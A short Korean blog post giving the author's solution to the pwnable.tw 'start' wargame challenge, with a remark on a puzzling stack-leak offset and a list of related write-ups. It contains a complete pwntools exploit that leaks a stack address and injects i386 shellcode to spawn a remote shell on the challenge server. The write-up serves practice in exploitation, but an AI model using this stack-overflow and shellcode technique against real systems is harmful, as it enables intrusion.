삽질했던게 leak을 할때 세번째 주소를 읽었었는데 스택영역 주소임에도 불구하고 offset이 안맞았다. start의 ret AAAA BBBB CCCC에서 CCCC부분의 주소였는데 aslr이 다르게 적용되는 걸까? 잘 모르겠다 음.. 왜지
from pwn import * #r=process('./start') r=remote('chall.pwnable.tw',10000) payload='A'*20 payload+=p32(0x8048087) r.recv(1024) r.send(payload) leak=u32(r.recv(4)) print hex(leak) payload = 'A'*20+p32(leak+0x14)+asm(shellcraft.i386.linux.sh()) r.sendline(payload) r.interactive()
'war game > pwnable.tw' 카테고리의 다른 글
[pwnable.tw]applestore (0) | 2017.03.22 |
---|---|
[pwnable.tw]silver_bullet (0) | 2017.03.11 |
[pwnable.tw]hacknote (0) | 2017.03.09 |
[pwnable.tw]calc (0) | 2017.03.06 |
[pwnable.tw]orw (0) | 2017.03.04 |